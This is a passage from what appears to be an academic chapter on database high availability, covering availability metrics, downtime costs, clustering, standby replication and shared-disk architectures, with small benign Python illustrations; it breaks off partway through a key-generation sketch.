• Service availability—Customer-centric focus (service orientation): The emergence of the Service Availability model as a driving concept in system design represents a shift from a technology-centric orientation to a customer-centric one. A service availability solution includes providing high availability at the level of 5-Nines or better, but it adds the requirement of service continuity: maintaining the integrity of customer connections and transactions without interruption despite any hardware or software failures in the infrastructure. Neither scheduled maintenance nor unexpected failure ought to prevent or disrupt provision of service to a customer. A service availability solution therefore requires that a system be highly available and provide continuity of service. A system configured with redundant components can, when those components fail, switch over to the standby components without ultimately jeopardizing the metrics of reliability or availability, even though connections might be dropped or data lost or degraded. Thus, a service availability solution carries the caveat that, during switchover scenarios, customer data and application state must be preserved in order to provide continuity of service to the end-user. Service availability design requires a perspective that can account for and coordinate resources and technologies throughout the system. It requires real-time checkpointing of current data to hot standby resources and rapid, seamless switchover in case of active resource failure. Because the continuity of service ultimately depends on the resources and the functioning of the system as a whole, service availability management requires an integrated, total-system approach.
HIGH AVAILABILITY ENVIRONMENT

To understand availability, we first need to understand reliability. The reliability of an element
is the conditional probability that the element will operate during a specified period of time. A system may be considered highly reliable (that is, it may fail very infrequently), but, if it is out of service for a significant period of time as a result of a failure, it will not be considered highly available (Singh, 2001). As another definition, high availability is more than excellent reliability. It is achieved through high service availability, the avoidance of downtime (including all maintenance downtime), and extreme data integrity, with no loss of stored data under any circumstances (High Availability White Paper, 2001). Availability, usually measured on an annual basis, refers to the percentage of time which service is available to the users (Sauers, 1996). This covers mission-critical applications, e-mail, scheduling services, and other business solutions used by organizations and companies for their day-to-day operations. There are two factors that determine system availability. The first factor is the reliability of the individual components that comprise the system. These components include server hardware, the server operating system, and the application itself. Other components may include data storage devices, network access devices, databases, file systems, and the data center infrastructure. The second factor is the time it takes for the application to be restored once a failure has occurred. The amount of time it takes to bring an application online again is dependent on the component that failed. If the application itself has failed, all that may be required for recovery is to simply restart the application (Bender & Joshi, 2004).
Levels of Availability
• High availability: This is a system or application designed to prevent a total loss of service by reducing or managing failures. The major goal of a highly available system is to provide a higher level of availability than a standard system. It achieves this goal by preventing single points of failure (SPOF) in common hardware, including CPUs, disks, host adapters, network adapters, hubs, and routers.
• Fault tolerance: More expensive than a highly available system (by as much as five times), a fault-tolerant system contains multiple hardware components that function concurrently, duplicating all computation by incorporating redundant hardware components in a single system. However, a fault-tolerant system can still fail when the system or application software fails.
• Continuous availability: As the name suggests, these systems are designed to provide continuous availability, which equates to non-stop service with no planned or unplanned outages. Hardware and software failures can still occur; however, the intention is to insulate users from the failure and to reduce the time needed to recover from it to several minutes or less. In a continuously available system environment, patches and upgrades can be performed with no impact on the users.
We can contrast the main difference in concept between fault tolerance and high availability. Fault tolerance provides additional resources that allow an application to continue functioning after a component failure without interruption (A Framework for System High Availability, 2000; Brown, 2000; Providing Open Architecture, 2001). Many of the high-availability solutions on the market today actually provide fault tolerance for a particular application component. Disk mirroring, where there are two disk drives with identical copies of the data, is an example of a fault-tolerant component. If one of the disk drives fails, there is another copy of the data that is instantly available for the application to continue execution. A fault-tolerant system would be used in a situation
where no downtime can be tolerated at all, such as air-traffic-control systems, emergency-response systems, or financial-trading systems.

Box 1.
Availability = MTBF / (MTBF + MTTR)
Total downtime in a year = (Planned shutdown + Unplanned shutdown) in hours
Availability of a system = ((Number of hours in a year - Total hours of downtime in a year) / (Number of hours in a year)) × 100
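As a quick illustration of the formulas in Box 1, the following short Python sketch computes availability from an assumed MTBF/MTTR pair and from assumed annual downtime hours; the figures are hypothetical and chosen only to show the arithmetic.

# Illustration of the Box 1 formulas; MTBF, MTTR, and downtime values are hypothetical.

def availability_from_mtbf(mtbf_hours, mttr_hours):
    """Availability = MTBF / (MTBF + MTTR)."""
    return mtbf_hours / (mtbf_hours + mttr_hours)

def availability_from_downtime(planned_hours, unplanned_hours, hours_per_year=8760.0):
    """Availability (%) = ((hours per year - total downtime) / hours per year) * 100."""
    total_downtime = planned_hours + unplanned_hours
    return (hours_per_year - total_downtime) / hours_per_year * 100.0

if __name__ == "__main__":
    # A component with a 10,000-hour MTBF and a 4-hour MTTR (assumed values).
    print(f"{availability_from_mtbf(10_000, 4):.4%}")
    # Roughly 8.8 hours of total downtime per year corresponds to about 99.9% ("3-Nines").
    print(f"{availability_from_downtime(6.0, 2.8):.3f}%")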
Metrics of High Availability

Availability is a function of system reliability and reparability, augmented and supported by redundancy. To quantify and identify the availability of any system, academic and industry sectors have defined two metrics that formalize the definition of a system's availability:
• Reparability—Mean Time To Repair (MTTR): Achieving high availability is also a factor of how quickly a system can be repaired when failures occur. Reparability is the measure of how quickly a failed device can be restored to service, expressed as a Mean Time To Repair (MTTR). The industry and the academic world today concentrate on finding solutions to reduce this time and to make it transparent to the users.
• Reliability—Mean Time Between Failures (MTBF): Individual components have their own MTBFs. The MTBF of a system can be calculated by considering the failure rate of each component in the system. As systems have more and more components, the system MTBF will always go down. Today's industry has made significant progress in achieving very good MTBF
through redundant hardware and software (e.g., clustered nodes to avoid single point of failure, application availability standpoint, etc.). Another way of expressing availability is referred to as number of Nines. This is expressed as a percentage of uninterrupted service per year and hence the downtime. A system is considered highly available when its availability is 99.9%, also called “3-Nines” (Arora, 2005; Bauer, 2001; Brien, 2000). For example, 528 minutes of system unavailability per year results in 99.9% or “3-Nines availability”, and 5 minutes of system unavailability per year results in a 99.999% or “5-Nines availability”. In the absence of any redundancy in the system platform, availability is given by a simple formula shown in Box 1. Achieving an acceptable level of availability in carrier-grade systems just by striving for high MTBFs and low MTTRs is generally not practical with today’s technology, due to two factors. First, despite tremendous advances in the reliability of computer hardware, the system MTBFs of complex systems are too low because of the number of components they contain. This is particularly true since failures are caused by software errors as well as hardware faults. Second, most service providers are not willing to deploy a system which is subject to a multiple-hour outage while it is being repaired, regardless of how unlikely that outage
may be. To attack both of these problems, high availability systems invariably contain redundant components (High Availability and More, 2001; Standards for a Service Availability, 2002).
• Redundancy: Redundancy augments the reparability of individual components by establishing a backup or standby for various components in the system. When there are multiple resources providing the same functionality, they can take over for one another very quickly in case of failure, driving the system MTTR toward zero. The effectiveness of redundancy is a function of how much redundancy a system contains, and how quickly backup components can be brought into service when failures occur.
Costs of Service Downtime

Uptime is the usual measurement of availability; it refers to the time during which users can access the application. Downtime is the opposite of uptime: the amount of time that a database system or service is unavailable to users. There are two ways to categorize system downtime: some downtime results from system failures, and some results from scheduled outages. Scheduled outages, such as those for repairs and upgrades that have minimal impact on the business, are considered maintenance. For many applications, availability during business hours is required, but some downtime during non-business hours is acceptable. System failure outages can be caused by environmental events such as loss of electricity, fires, floods, and earthquakes, in addition to platform failures, application failures, or human errors. Although hardware failures are traditionally the major cause of downtime, software failures and user errors are a growing cause. Generally, there are three types of downtime (Barraza, 2002; Kumar, 2005; Saito, Bershad, & Levy, 1999):
• Planned downtime: This is normal downtime that is planned and scheduled in advance. It is normally scheduled for patches, upgrades, and maintenance activities such as database reorganization, adding disk storage, performing offline backups, and installing patches, upgrades, or new applications. It usually occurs during off-peak processing times such as off-hours or holidays.
• Semi-planned downtime: This includes software or hardware upgrades that are scheduled, but not entirely by the service provider. An example might be when a vendor releases security patches that must be applied quickly to avoid vulnerability; the schedule is largely driven by others.
• Unplanned downtime: Unplanned downtime is associated with unexpected events such as network, hardware, and software failures. A typical distributed application usually consists of a Web browser front-end and an application reliant upon servers, networks, and databases. As a problem with any of these components can cause the application to become unavailable, all components need to be monitored equally.
Many harmful consequences may occur as a result of service downtime. The following examples illustrate the high impact of service downtime (Gribble, Brewer, Hellerstein, & Culler, 2000):
• Downtime means down revenue: When an application that runs a business is brought down by database failure, the most immediate and obvious cost is the loss of revenue. Typically, an e-commerce site may suffer losses from $10K to $100K every hour, depending on the volume of the online sales transactions. Large telesales businesses like airline reservations, catalog sales, and TV-based home shopping can easily miss sales opportunities of $100K per hour. In
financial markets, losses total millions of dollars per hour of downtime.
• Downtime damages relationships: Many organizations now offer Web-based applications and interfaces that provide access to databases. Some of these provide customers, in a self-service fashion, with information about their outstanding orders or account balances. Other applications give partners (e.g., suppliers and distributors) access to inventory levels and production schedules. Such applications are very valuable; therefore, customers and partners develop dependencies and expect them to be available continuously. Database downtime thwarts these expectations, thus damaging important relationships. Customers and partners may shift their business elsewhere, perceiving downtime as a lack of dependability.
• Downtime disrupts supply chains: In the manufacturing sector, database downtime can hamper material management and resource planning, which, in turn, reduces yield on the production floor. Likewise, in the retail industry, database downtime halts just-in-time inventory, which depends heavily on database access. When a trade exchange suffers database downtime, it disrupts the supply chains of hundreds of companies.
• Downtime erodes brand and share value: For a company that operates largely online, all it takes is a well-publicized outage to tarnish the company's reputation. Once a brand is deemed unreliable, financial consequences usually follow on the perception-driven stock market, adversely affecting share price, financial valuation, and market capitalization.
• Downtime has legal repercussions: When companies do business together online, they often sign a contract such as a service-level agreement. A service outage can cost the provider dearly in fines and litigation. As
protection from these legal repercussions, service providers and Web services companies need to ensure the highest availability possible for databases and applications.
Key Requirements of a Service Availability Solution

Continuous availability of voice, data, and multimedia communication services depends on each part of the multi-service networks working reliably to deliver these services without interruption. Hardware and software redundancy enables the management software to replace failed resources with the appropriate standby resources such that services remain available. Accomplishing this without downtime or loss of data and state requires a comprehensive and unified solution. The entire availability management cycle must operate automatically, without human intervention and in real-time (High Availability and More, 2001). Information about the system must be collected and assessed in order to keep the system manageable. System resources must be represented, and their status, topology, and dependencies must be modeled and monitored. System faults must be quickly detected, diagnosed, and fixed. Fault data must be provided to an intelligent availability-management service so that it can respond quickly and appropriately by initiating actions to reconfigure resources and restore normal operation. In other words, the system must be self-managing and self-reliant. Thus, implementation of a service availability solution requires management software that can (see the sketch after this list):
• Collect system data in real-time
• Configure and maintain a state-aware model of the total system
• Checkpoint data to redundant resources
• Detect, diagnose, and isolate faults
• Perform rapid and policy-based recovery
• Dynamically manage the configuration and dependencies of all components in the system
• Provide administrative access and control
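The sketch below illustrates, in Python, how such management software might be organized as a control loop over a state-aware model of the system: it detects a missed heartbeat and applies a policy-based recovery action. The resource names, timeout, and policy table are invented for illustration; real availability-management middleware is far more elaborate.

# Minimal, hypothetical availability-manager loop; names and policies are illustrative only.
import time

class Resource:
    def __init__(self, name, standby=None, state="active"):
        self.name = name
        self.standby = standby              # name of the redundant standby, if any
        self.state = state
        self.last_heartbeat = time.time()

# Policy table mapping a diagnosed fault to a recovery action (invented).
RECOVERY_POLICY = {"heartbeat_lost": "failover_to_standby",
                   "process_crash": "restart_in_place"}

def detect_faults(model, timeout=5.0):
    """Return active resources whose heartbeat is older than `timeout` seconds."""
    now = time.time()
    return [r for r in model.values()
            if r.state == "active" and now - r.last_heartbeat > timeout]

def recover(model, resource, fault="heartbeat_lost"):
    """Apply the policy-based recovery action and update the system model."""
    if RECOVERY_POLICY[fault] == "failover_to_standby" and resource.standby:
        resource.state = "failed"
        model[resource.standby].state = "active"
        print(f"failover: {resource.name} -> {resource.standby}")
    else:
        print(f"restarting {resource.name} in place")

# One pass of the cycle: collect data, detect, diagnose, and recover.
model = {"db-primary": Resource("db-primary", standby="db-standby"),
         "db-standby": Resource("db-standby", state="standby")}
model["db-primary"].last_heartbeat -= 10    # simulate a missed heartbeat
for failed in detect_faults(model):
    recover(model, failed)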
STRATEGIES FOR DATABASE AVAILABILITY

There are two aspects to database availability: (i) the severity of database downtime and the latency of database recovery, which provide a context for understanding general categories such as high availability, continuous availability, and disaster recovery; and (ii) specific strategies for database availability, such as maintenance, clusters, replication, and backup/restore (Russom, 2001).
Severity of Database Downtime

When it comes to database availability, continuous availability, where the database never suffers downtime, stands out as the ultimate goal. This goes beyond the requirements of most users; therefore, many companies require only high availability, which allows for planned downtime to maintain their databases. Planned downtime is not severe, because it is always scheduled for periods of low system activity. Even with the best-laid plans, some form of hardware or software failure is inevitable. When the database availability strategy cannot recover automatically, unplanned downtime occurs; this is fairly severe, because it may require hours of IT personnel time to restore database operations. However, IT departments with well-designed plans can recover quickly and minimize unplanned downtime to provide a relatively high level of database availability. Catastrophic downtime, the severest level of database downtime, occurs when hardware and
facilities are damaged such that they cannot be repaired. Catastrophic events include hurricanes, tornados, flooding, earthquakes, fires, and explosions. When these destroy or damage a physical site, the strategy for disaster recovery must include a pre-prepared facility at a separate site. Ideally, the original site and the recovery site should be separated by a fair amount of geographic space. This is to ensure that both sites do not suffer downtime from the same catastrophic event. Note that multiple, geographically-dispersed data centers are not just for disaster recovery. This strategy can also ensure continuous availability when the primary data center is knocked out due to a disabling temporary event such as a rolling blackout.
Latency of Database Recovery

Latency has two meanings for database availability. The first refers to the amount of time it takes to return to full operation after a failure. Technical people sometimes use temperature as an analogy for quantifying the recovery period. For instance, clusters are hot: failover is instantaneous and seamless, whereas the time-consuming process of restoring a database from a backup tape is cold. Somewhere between these extremes, replication technologies are considered warm. The second meaning of latency is how up-to-date the database content is after the failure, as compared to before. For example, when a database is corrupted at noon and is restored from a backup made the previous midnight, twelve hours of inserts and updates are lost. Likewise, with asynchronous forms of replication, the standby database may be a few minutes behind the primary one, simply because it takes time to collect and communicate data over a network.
STRATEGIES FOR DATABASE AVAILABILITY

Online and Offline Maintenance

Maintenance is the main factor in determining database availability. For instance, most planned downtime is devoted to database maintenance or reconfiguration. Although planned, bringing down the database for maintenance is nonetheless downtime that cannot help but impact someone in businesses that operate 24x7. Furthermore, many database administrators and IT managers confess that maintenance tasks sometimes go awry, thus extending planned downtime into unplanned downtime. For these reasons, modern database administrators insist on performing maintenance operations online whenever possible. With some databases, it is now possible to execute online backups, table reorganization, re-indexing, fault isolation, and so forth. This reduces planned downtime, as well as the probability that it may extend into unplanned downtime (Lumpkin, 2004). Furthermore, online maintenance enables database administrators to adapt readily to change, without waiting for a window of planned downtime. Related to maintenance is the issue of configuration. In the early days of database management systems, the smallest change of data structure or operating environment required the database administrator to halt the database and restart it with new parameters. That is unthinkable in today's fast-changing business environment: a restart is a form of downtime. Therefore, a database that supports dynamic reconfiguration is an important and integral component of any high availability strategy.
High Availability Clusters

Hardware clusters with database servers are the preferred strategy for achieving the shortest recovery period after a hardware or database failure.
A cluster typically has two or more nodes with a database server active on each to create a hot standby capability (Low Cost High Availability, 2004). If a database server fails, another can take its load instantaneously, assuring continuous availability to client applications. Although the hot standby capability of a high availability cluster provides the least latent path to recovery, clustering has serious geographic limitations. Communication between nodes usually takes place via some form of Small Computer System Interface (SCSI) or another protocol that is not suited to Wide Area Network (WAN) or Internet communications. Therefore, the nodes of a cluster must sit in close proximity, usually in the same data center. This works well until an event makes the data center unusable, whether temporarily or for a longer term. Thus, a cluster must be complemented by another database availability strategy that involves multiple, geographically-dispersed data centers to ensure continuity when the primary cluster fails.
Warm Standby Replication and Switching

Replication is a software strategy for duplicating data from a primary database to a standby. Warm standby replication means that the standby is kept online and fully operational such that it can take over immediately and automatically when the primary database fails. To keep the two databases synchronized, transactions are replicated on a continuous or scheduled basis. The two databases run on separate servers, writing to separate disk devices; therefore, a failure on one leaves the other unaffected. On the upside, failover is fairly immediate because the replicated warm standby database is always online. The servers for the primary and standby databases can be physically located in different geographic areas communicating via a WAN; thus, losing one site brings down only one server. The replication process does not affect application
performance because it executes asynchronously after a transaction is committed. Replication software can operate in tandem with clustered and/or fault-tolerant hardware to achieve higher levels of availability. On the downside, however, the warm standby database tends to be latent because it takes time to communicate data additions and changes. During peak times, the load on the primary server may starve the replication process, causing the standby to be several minutes behind. Although warm standby replication is excellent for automatic database server failover, it is of no help with client failover. In general, client applications must restart to connect to the new server after failover. To get around this limitation, warm standby replication can be complemented with a switching mechanism, which ensures that clients do not need to reconnect in the event of a failover. With switching technologies, automatic client failover is transparent to most end-users, who see only a slight delay while the switch is made. In short, warm standby replication (combined with switching) approaches the low data latency and seamless server and client failover of a cluster. However, its geographic flexibility makes warm standby replication ideal for disaster recovery after the catastrophic loss of a data center.
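Where no transparent switching layer is available, a crude form of client switching can be approximated in the application itself. The sketch below is a generic, hypothetical illustration: the server addresses and the db_connect placeholder stand in for a real driver's connect call, and a production mechanism would be considerably more careful about transaction state.

# Hypothetical client-side failover wrapper; hosts and the connect call are stand-ins.
import time

PRIMARY = {"host": "db-primary.example.com", "port": 5432}
STANDBY = {"host": "db-standby.example.com", "port": 5432}

def db_connect(server):
    """Placeholder for a real database driver's connect() call."""
    if server is PRIMARY:
        raise ConnectionError("primary unreachable")        # simulate a failed primary
    return f"connection to {server['host']}"                 # stand-in for a connection object

def connect_with_failover(retries=2, delay=0.5):
    """Try the primary first; redirect to the warm standby if it cannot be reached."""
    for server in (PRIMARY, STANDBY):
        for _ in range(retries):
            try:
                return db_connect(server)
            except ConnectionError:
                time.sleep(delay)
        print(f"giving up on {server['host']}, switching to the next server")
    raise RuntimeError("no database server available")

print(connect_with_failover())    # falls through to the standby in this simulation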
Cold Standby

As a low-end strategy for database availability, many companies depend on backup and restore. After all, the utility programs that come with a database management system, as well as supporting tools, have reached a mature stage where they are feature-rich, robust, and fast. In addition, the best practices for backup and restore are easy to grasp and straightforward to implement. But there is a catch: it takes time to restore a database after a failure or corruption. The restore process could last for hours while end-users sit idle. Hence, with a backup and restore strategy,
there is considerable latency in recovery, as well as latency in the sense of a delta between the content of the backup and the primary database at the moment of failure (Disaster Recovery Package, 2004). The latency of backup and restore can be reduced considerably by implementing a so-called cold standby, which simply extends the backup process with an extra step that restores backups to a standby database server. Since the standby database is cold, it takes a few minutes to bring it online, but this is a fraction of the latency of a full restore process. If transaction logs are also shipped periodically from the primary to the standby, the latency of the database content is reduced as well. Hence, a cold standby extends tried-and-true backup-and-restore procedures to achieve database high availability with a level of data loss that is acceptable for lower-valued transactions.
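A cold standby is typically fed by a scheduled job rather than by continuous replication. The following sketch is a generic illustration of the extra log-shipping step described above; the directory paths and 15-minute interval are invented, and a real deployment would use the DBMS's own backup and log-archiving utilities.

# Hypothetical log-shipping job for a cold standby; paths and interval are invented.
import shutil
import time
from pathlib import Path

PRIMARY_LOG_DIR = Path("/var/db/primary/archived_logs")
STANDBY_LOG_DIR = Path("/var/db/standby/incoming_logs")
SHIP_INTERVAL_SECONDS = 15 * 60

def ship_new_logs():
    """Copy archived transaction logs that the standby has not yet received."""
    STANDBY_LOG_DIR.mkdir(parents=True, exist_ok=True)
    already_shipped = {p.name for p in STANDBY_LOG_DIR.iterdir()}
    for log in sorted(PRIMARY_LOG_DIR.glob("*.log")):
        if log.name not in already_shipped:
            shutil.copy2(log, STANDBY_LOG_DIR / log.name)
            print(f"shipped {log.name}")

if __name__ == "__main__":
    while True:                      # in practice this would be a cron or scheduler job
        ship_new_logs()
        time.sleep(SHIP_INTERVAL_SECONDS)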
PERFORMANCE IMPACT ON AVAILABILITY

Downtime is not the only concern when dealing with high availability. Most large applications face diverse processing needs. On one hand, online users require good response time from many short transactions. On the other hand, large batch jobs (e.g., reports and complex extracts) expect high throughput from a handful of very large transactions. These conflicting needs cause response time to fluctuate, decreasing the reliability and availability of the application. This is especially a concern with applications that provide services directly to end users and consumers, such as e-commerce applications.
Redundancy is the Key to Availability

The logical solution for increased availability is to maintain the data in more than one place. Coincidentally, one of the best solutions for improving application response time is to separate the batch
reporting and extract processing from the Online Transaction Processing (OLTP). This solution also requires a redundant database. This means that owners of large critical applications are seeking a solution that provides both high availability and the ability to offload non-critical processing from the main system (Aronoff, 2003). The criteria for a comprehensive high availability and high performance solution include existence of a full copy of the primary database, which should be accessible even when there is no emergency, mainly for reporting and extracts. Furthermore, the copy of the database should be an up-to-date image of the primary database. When a disaster occurs, the copy should be capable of becoming the primary database (failover). After the disaster, the solution should take into account the switch back to the primary system. Certainly, failover practice to the secondary database should be very fast, and no data should be lost during the process.
Range of Common Solutions

There is a wide range of solutions to the high availability problem. The most common approaches are (Aronoff, 2003):
• Local disk mirroring: This approach provides protection against many disk-related failures, but the mirror is usually not breakable under normal circumstances. Once broken, the mirror becomes stale relative to the copy that is still operational. To resynchronize, many disk mirror solutions perform a complete copy of the data from the operational copy to the stale copy. If the database is large, this process can take a long time. Such an approach does not provide a resolution for a local disaster. It also does not provide protection against physical block corruption or accidental loss of data due to a database administrator's (DBA) error.
• Remote disk mirroring: Remote disk mirroring provides the protection of disk mirroring, but to a remote location. Remote disk mirroring comes in two flavors: synchronous and asynchronous. With asynchronous mirroring, the primary system does not wait for the data to be committed to the remote disk. With synchronous mirroring, the application waits for the data to be committed to both the local and the remote disk. In asynchronous mirroring, when a switchover is required, the DBA will not be able to open the remote database; for this reason, most remote mirroring implementations use the synchronous method. However, with this method, wide bandwidth is needed between the source and destination; otherwise, the network will slow the primary system.
• Standby databases: This solution provides some protection against a catastrophe that makes the primary database unavailable, but it has some shortcomings. The copy is only as current as the last log that was applied. Once the standby database is opened and modified, a complete image is required to reconstruct it. Additionally, some administration is required for the standby database as the structure of the source database changes, such as adding data files or auto-extending table spaces. Also, the standby database does not provide protection against certain types of database block corruption.
• Local clustering: Local clustering is a hardware solution that enables multiple computers to share a set of disks. Applications on these computers are written such that they can freely migrate between the machines in the cluster using a technology known as floating IP addresses. This approach provides good protection against most common failures. However, since there is only one copy of the database, there should still be consideration for protection of the disks. Moreover, since there is only one copy of
the database, any physical block corruption or accidental dropping of a database object will cause the application to fail.
• Replication: Replication provides the ability to have a live remote database that can be used both to reduce the workload of the primary system and for failover when a disaster happens. The live database on the remote site does require database administration, and applying patches to the application is not straightforward.
• Local clustering with Oracle Parallel Server: Database parallel servers offer another alternative for high availability systems. Using this facility, many instances of the database running on different hardware can access the same database on shared disks. This permits the hardware that would otherwise be allocated to a standby system to be actively used in production.
The difficulty in using such an approach for highly available solutions is that the application needs to be designed such that transferring blocks between instances (pinging) is minimized; if not, application performance can be severely degraded. Also, there is only one copy of the database, which is not protected from disk failures, block corruption, or human errors such as an accidental table drop.
DATABASE AVAILABILITY SOLUTIONS AVAILABLE FROM DBMS VENDORS

The explosive growth in e-services and other Internet-based applications, along with the increased demand for 24/7/365 global operations, has placed a greater emphasis on the need for continuous data and system availability. There are two main hardware concerns with respect to maintaining a highly available database environment: server high availability and storage availability (Arora, 2005). High availability of the database tier is
achieved by the implementation of clustering. Operating system vendors and database vendors have devised their own methods to implement clustering for the database server. As many of today's enterprise applications rely on commercial databases, this section is intended to demonstrate and review current best practice regarding their design and configuration. Although there are many similarities between database products, we base our discussion on the different practices offered by today's database management systems. The primary technological consideration in a database high-availability environment is protection against server failure. Server failure can be defined as an unplanned event that causes the server system to be inaccessible by users (Otey & Otey, 2005). A number of different hardware and software factors can cause server failure, including:
• Hardware failure (CPU, RAM, storage, I/O, or power supply)
• Operating system or device driver failure
• Database server failure
The protection approach against hardware failure is to invest in a hardware platform that provides redundancy of key components. On the software side, protection comes from keeping the operating system, device drivers, and application software up-to-date with the most recent service packs (DB2 Operation, 2000). For highly available database platforms, clustering technologies, database replication, and database log mirroring are the main implementation approaches for protection against database server failure. Clustering essentially uses multiple servers in an environment where one or more backup servers can seamlessly take over the workloads of a failed primary server. This section will examine each of these alternatives and discuss how they are implemented by the enterprise database products.
Database Clustering

With database clustering, each physical server in the cluster is called a node. The entire group of nodes works together to form a cluster. These clustered nodes can be viewed as a single node/server. Presenting a single server instead of multiple clustered nodes is accomplished by sharing common resources. These resources can be disk storage, Internet Protocol (IP) addresses, and application instances. All of the nodes in a cluster are in a state of constant communication. If one of the nodes in a cluster becomes unavailable, another node will automatically assume its duties and begin providing users with the same services as the failed node. Typically, each node will have active resources simultaneously. In such cases, synchronization of database content and transactions is an important aspect; this is accomplished by means of the database replication feature. In the event that one of the nodes fails, another node will immediately take over active ownership of all of its resources. This process is called failover. Each node in a cluster needs to keep the other nodes in that cluster informed of its health and configuration. This is done periodically by broadcasting a network message, called a heartbeat, across a network. The heartbeat signal is usually sent over a private network (e.g., the cluster interconnect), which is used for inter-node communications (Chandrasekaran & Kehoe, 2003). The failover process for a database cluster should require only a short interval of a few seconds to complete, depending on the hardware employed. In addition, the database on the failover node must be recovered to maintain transactional consistency. The length of this recovery period depends largely on the level of database activity that was occurring at the time of failover and the type of hardware used. Clients connected to the failed node are disconnected. When they attempt to reconnect, they are able to access the cluster
resources on the backup node (a simplified heartbeat-and-failover sketch is given after the list below). Different database clustering solutions might offer the following advantages:
• Automatic failover: When a failure is detected, the cluster automatically switches from the primary node to the secondary node.
• Transparent to clients: After the failover is complete, clients can reconnect to the cluster using the same virtual name and/or IP address.
• Transactional integrity: All committed transactions are saved and made available after the failover process completes.
• Rapid failover: The failover process for the system can be completed in a few seconds. The subsequent database availability depends on the number of transactions that need to be rolled forward or rolled back.
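The heartbeat mechanism described above can be pictured with a small sketch. The broadcast address, port, message format, and missed-beat threshold below are all invented for illustration; real cluster interconnects use dedicated protocols rather than ad-hoc UDP messages.

# Hypothetical heartbeat sender and monitor over a private cluster network (UDP broadcast).
import json
import socket
import time

INTERCONNECT = ("10.0.0.255", 9999)     # invented private-network broadcast address
NODE_NAME = "node1"
BEAT_INTERVAL = 1.0
MISSED_BEATS_BEFORE_FAILOVER = 3

def send_heartbeats():
    """Periodically broadcast this node's health on the private network."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    while True:
        sock.sendto(json.dumps({"node": NODE_NAME, "ts": time.time()}).encode(),
                    INTERCONNECT)
        time.sleep(BEAT_INTERVAL)

def monitor_peers():
    """Mark a peer failed after several missed heartbeats and begin failover."""
    last_seen = {}
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(("", INTERCONNECT[1]))
    sock.settimeout(BEAT_INTERVAL)
    while True:
        try:
            data, _ = sock.recvfrom(1024)
            beat = json.loads(data)
            last_seen[beat["node"]] = beat["ts"]
        except socket.timeout:
            pass
        deadline = time.time() - MISSED_BEATS_BEFORE_FAILOVER * BEAT_INTERVAL
        for node, ts in list(last_seen.items()):
            if ts < deadline:
                print(f"{node} missed its heartbeats; taking over its resources")
                del last_seen[node]          # actual failover of resources would go here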
Recently, most commercial database management system providers have started to address cluster architectures using numerous approaches, while other providers use solutions offered by third-party companies with limited support for scalability and high availability (Cecchet, Marguerite, & Zwaenepoel, 2004). Database clusters are designed to support additional nodes, with two primary architectures (Tendulkar, 2005): Shared Storage (usually called Shared-Disk) and Shared None (usually called Shared-Nothing). Although many papers have been written on the features of these two database architectures, the distinction can still be confusing. It is important to understand both the concepts and the features acquired by implementing each approach, especially when deploying for database high availability. The following paragraphs illustrate the main issues regarding shared-disk and federated databases as a step towards shared-nothing database clusters.
Figure 1. Basic database clustering structure (cluster nodes on a public network, connected to one another through a network switch by a private heartbeat network, and attached to a shared storage system)
• Shared-disk cluster database architecture: The shared storage type of architecture stores the entire database on storage disks that can be directly accessed by each node. This model has typically been the best for scaling the database to handle a large number of concurrent clients, especially in an Online Transaction Processing (OLTP) environment. Transactions running on any instance can directly read or modify any part of the database. Such systems require the use of inter-node communication to synchronize update activities performed from multiple nodes. When two or more nodes contend for the same data block, traditional shared disk database systems use disk I/O for synchronizing data access across multiple
nodes (i.e., the node that has a lock on the data writes the block to the disk before the other nodes can access the same data block) (Chandrasekaran & Kehoe, 2003). A node can be made up of multiple processors; a common type of node is a Symmetric Multi-Processor (SMP) node. Each node has its own dedicated system memory as well as its own operating system and database instance. Shared disk database architectures run on top of hardware clusters that give every participating server equal access to all disks. However, servers do not share memory; the clustered database combines the memory in the individual nodes to provide a single view of the distributed cache memory for the entire database system (Cai & Leung, 2002).
Figure 1 demonstrates the basic structure of a database cluster. The primary cluster components are the processor nodes, a cluster interconnect, and a shared storage subsystem. The nodes share access to the storage subsystem and the resources that manage data, but they do not physically share main memory. Clustered databases have a single data dictionary and a single system image. Each cluster node requires the following hardware:
• A hard disk for the server's operating system: This disk is not shared and is not connected to the controller that is used to connect to the shared storage. Instead, the disk uses its own controller and should be mirrored for improved availability.
• High-speed connection adapters (i.e., Network Interface Cards (NICs)) that connect to the cluster's shared disk storage: One NIC is used to connect the cluster node to the external network. The second NIC is used for the private cluster network, which maintains the heartbeat of the cluster (a signal indicating that a node is available).
Because the nodes in a cluster use a shared storage subsystem, they typically need to be in relatively close proximity to one another. The distance between nodes depends on the connection that the nodes use for the storage subsystem. Geo-clusters (multi-site clusters) are formed by separating the cluster nodes geographically. Such a structure is accomplished by synchronously mirroring the quorum disk between the different locations. Generally, a cluster is essentially unaware of the geographic distance between its nodes, so these solutions must be implemented at the network and storage levels of the organization's infrastructure.
• A database instance that runs on every node of the cluster: Transactions running
on any instance can read or update any part of the database. There is no notion of data ownership by a node. System performance depends on the database effectively utilizing a fast interconnect between cluster nodes. An N+1 configuration (N active nodes with one spare node) provides a very flexible and cost-effective clustering scenario for enabling highly available applications. For instance, with a four-node cluster in an N+1 configuration, you can have three of the four nodes set up to actively provide different services while the fourth node is a passive node that is ready to assume the services of any of the three active nodes in the event of a server failure.

Clustering is powerful, but not all database clustering is the same. There are as many implementations as there are databases. The costs of these vary significantly, and many vendors leave too many of the practical issues of clustering up to the application programmers, which significantly impacts the cost and complexity of the solution (Choosing the Right Database, 2004). Even among databases that provide clustering, many of the challenges of clustering are not addressed in the design of the database; instead, the expectation is that application designers will do the necessary programming to make it work. Primary key generation, for instance, can be a serious problem in clustered databases. If the connection between clustered databases goes down and they are forced to operate independently, the databases may generate the same primary key and use it to insert a different record at each location. If this happens, the cluster will completely fail when the link comes back up and the keys conflict. Another often-overlooked issue is auto-failover, or the ability for clients to automatically connect to a second database server when the primary server goes down. The problem is that with most databases this is not automatic; therefore, application programmers need to build their application with clustering in mind.
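One common way to sidestep the primary-key collision problem just described is to give each node its own key space, for example with an offset-and-stride (interleaved sequence) scheme. The sketch below is an application-level illustration, not a feature of any particular cluster product.

# Offset-and-stride key generation: each node draws keys from its own arithmetic
# progression, so keys cannot collide even while the inter-node link is down.
class NodeKeyGenerator:
    def __init__(self, node_id, cluster_size):
        assert 0 <= node_id < cluster_size
        self.next_key = node_id            # offset = this node's id
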